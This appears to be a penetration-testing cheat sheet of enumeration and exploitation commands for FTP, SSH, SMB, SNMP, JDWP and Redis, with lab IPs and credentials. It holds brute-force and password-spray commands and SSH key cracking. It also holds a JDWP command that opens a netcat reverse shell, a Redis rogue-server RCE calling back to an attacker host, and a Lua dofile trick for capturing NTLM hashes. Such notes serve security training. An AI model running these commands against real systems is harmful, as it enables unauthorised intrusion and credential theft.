Enumerating Services

Public Exploits

# Google
site:github.com exiftool 11 exploit
Default Credentials Cassandra Web

# Search for public exploit
searchsploit exiftool 11

# View
searchsploit -x linux/local/50911.py

# Copy to current dir
searchsploit -m linux/local/50911.py

# Update
searchsploit -u

Nmap

# Sweep
nmap -sn 192.168.5.0/24 | grep for | cut -d “ ” -f 5 > ips.txt

# Extract ports to use them with -p
cat nmap.txt | python3 -c "import sys; import re; print(','.join(map(str, sorted(set(map(int, re.findall(r'\b\d{1,5}\b', sys.stdin.read())))))))"
22,26,51,80,81,135,139,445,592,1875,3306,3307,5040,5985,7882,18106,21229,46319,47001,49562,49664,49665,49666,49667,49668,49669,49670,56083,60460,63224

FTP (21)

Page not found - HackTricksbook.hacktricks.xyz

# Basic commands
tnftp -A IP
prompt OFF
binary
mget *
put file.txt
bye

SSH (22)

# Basic
nmap -p 22 -sV IP
sshpass -p 'pass' ssh -o StrictHostKeyChecking=no user@domain
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://

# Files
cat ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa
cat ~/.ssh/config

# Crack
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

# id_rsa
chmod 600 id_rsa
ssh -i id_rsa user@<target>

DNS (53)

# DNS Version
nmap --script dns-nsid

# Zone transfer
dig axfr @<IP> <domain>

SMB (139, 445)

Enumeration | NetExecwww.netexec.wiki

# Basic
nmap -sT -sU -sV IP -p135,137,138,139,445 --open
nmap --script "smb-enum-*" -p 445 192.168.244.40
ls -l /usr/share/nmap/scripts/smb*

nxc smb hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 --shares
smbmap -H IP -u user -p pass
smbclient -L //IP/ -U user%pass

# Vulns
nmap -T4 -p 139,445 --script smb-vuln* IP


# Automated
enum4linux -a 192.168.202.240

# No pass
smbclient -L //10.10.120.46/ -N
smbclient //192.168.202.240/ -N -c 'ls'
nxc smb 192.168.202.240 -u 'a' -p '' --shares

# Quick pass spray
python3 49362.py 192.168.202.240 -p 3000 /etc/passwd | awk -F: '{ print $1 }' > users.txt
nxc smb 192.168.202.240 -u users.txt -p SecondBiteTheApple330 --continue-on-success

# smbclient
smbclient //IP/Users -N
smbclient //192.168.209.175/"Password Audit" -U V.Ventz%pass
mask ""
recurse ON
prompt OFF
cd 'path\remote\'
lcd '/path/download/to/'
mget *

Simple Network Management Protocol (161)

# Scan
nmap -T5 -p 161 -sU
nmap -sU --script "snmp* and not snmp-brute"

# Brute force
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt IP snmp
[161][snmp] host: 192.168.198.149   password: public

# Enumerate
snmpwalk -v 2c -c public IP NET-SNMP-EXTEND-MIB::nsExtendObjects # apt-get install snmp-mibs-downloader
snmpbulkwalk -c public -v2c IP .

Java Debug Wire Protocol (8000)

Pentesting JDWP - Java Debug Wire Protocol - HackTricksbook.hacktricks.wiki

# https://github.com/IOActive/jdwp-shellifier
python3 jdwp-shellifier.py -t IP -p 8000 -c 'busybox nc IP 80 -e sh'

Redis (6379)

# Connect
redis-cli -h 192.168.172.176 -p 6379 # apt install redis-tools

# nmap
nmap --script redis-info -sV -p 6379 192.168.172.176
6379/tcp open redis Redis key-value store 4.0.14 (64 bits)
Vulnerable to Redis RCE: (<=5.0.5): https://github.com/n0b0dyCN/redis-rogue-server

./redis-rogue-server.py --rhost=192.168.172.176 --rport=6379 --lhost=192.168.45.225
--lport=4444


# https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html?highlight=Redis#lua-sandbox-bypass
redis-cli -h IP -p 6379 eval "dofile('//10.14.30.76//dir')" 0
responder -I tun0
hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

PreviousFile Transfers NextPivoting and Port Forwarding

Last updated 5 months ago